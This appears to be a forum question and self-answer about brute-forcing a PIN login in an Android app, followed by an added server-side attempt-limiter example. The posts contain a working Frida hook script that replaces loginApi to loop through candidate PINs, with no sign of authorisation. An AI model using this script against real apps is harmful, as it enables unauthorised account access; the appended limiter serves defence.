I am having trouble brute-forcing an app. The code of the method is below.
    private fun loginApi(phone: String, pin: String) {
        if (firebase_token.isEmpty()) {
            //
        } else {
            showDialog()
            //
            // Code to call api and perform authentication
        }
    }
I tried the below code, but that isn't working.
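    Java.perform(function () {
        // Wrapper for java.lang.String, used to build the arguments
        var string_class = Java.use('java.lang.String');
        var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
        // Replace loginApi(String, String) with an implementation that loops over PIN values
        OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function (phone_no, pin) {
            for (var i = 1140; i < 1151; i++) {
                send(i);
                var my_phone = string_class.$new('/*Number over here*/');
                var my_pin = string_class.$new(i); // i is a JavaScript number here, not a string
                var result = this.loginApi(my_phone, my_pin);
                console.log(result);
            }
            console.log('Done:');
        };
    });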
I am trying to brute-force using this method. Any help will be appreciated.
I managed to brute-force the method by just manipulating the Int to String conversion statement. The re-edited code is shown below:
    Java.perform(function () {
        // Wrapper for java.lang.String, used to build the phone argument
        var string_class = Java.use('java.lang.String');
        var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
        // Replace loginApi(String, String) with an implementation that loops over PIN values
        OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function (phone_no, pin) {
            for (var i = 1140; i < 1151; i++) {
                send(i);
                var my_phone = string_class.$new('/*Number over here*/');
                var my_pin = i + ""; /* Changed over here. */
                var result = this.loginApi(my_phone, my_pin);
                console.log(result);
            }
            console.log('Done:');
        };
    });
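For the team that owns the backend behind `loginApi`, the thread shows that the client can be made to submit any sequence of PINs, so the guess limit has to live on the server. The following is an added example, not code from the posts above: a per-phone attempt limiter in which the class name, the policy values, the phone number and the `verifyPin` stand-in are all hypothetical or constructed.

```javascript
// Added example: server-side PIN attempt limiter (hypothetical names, constructed data).
const MAX_FAILURES = 5;            // assumed policy: failed attempts allowed before lockout
const LOCKOUT_MS = 15 * 60 * 1000; // assumed policy: lockout duration in milliseconds

class PinAttemptLimiter {
  constructor(maxFailures = MAX_FAILURES, lockoutMs = LOCKOUT_MS) {
    this.maxFailures = maxFailures;
    this.lockoutMs = lockoutMs;
    this.state = new Map(); // phone -> { failures, lockedUntil }
  }

  // Returns 'ok', 'bad_pin' or 'locked'. verifyPin is the real credential check.
  attempt(phone, pin, verifyPin, now = Date.now()) {
    const entry = this.state.get(phone) || { failures: 0, lockedUntil: 0 };
    // While locked, reject without evaluating the PIN, so even a correct
    // guess reveals nothing to the caller.
    if (now < entry.lockedUntil) return 'locked';
    if (verifyPin(phone, pin)) {
      this.state.delete(phone); // success clears the failure counter
      return 'ok';
    }
    entry.failures += 1;
    if (entry.failures >= this.maxFailures) {
      entry.lockedUntil = now + this.lockoutMs;
      entry.failures = 0;
    }
    this.state.set(phone, entry);
    return 'bad_pin';
  }
}

// Constructed scenario: the same 1140..1150 sequence as in the thread, sent for
// one phone number at one instant, with 1149 as the (constructed) correct PIN.
function simulateSequentialGuesses() {
  const limiter = new PinAttemptLimiter();
  const verifyPin = (phone, pin) => pin === '1149'; // stand-in for the real check
  const results = [];
  for (let i = 1140; i < 1151; i++) {
    results.push(limiter.attempt('+10000000000', String(i), verifyPin, 1000));
  }
  return results;
}
```

Keying the counter on the account identifier rather than on the client session or IP is what makes it hold when the requests come from an instrumented app.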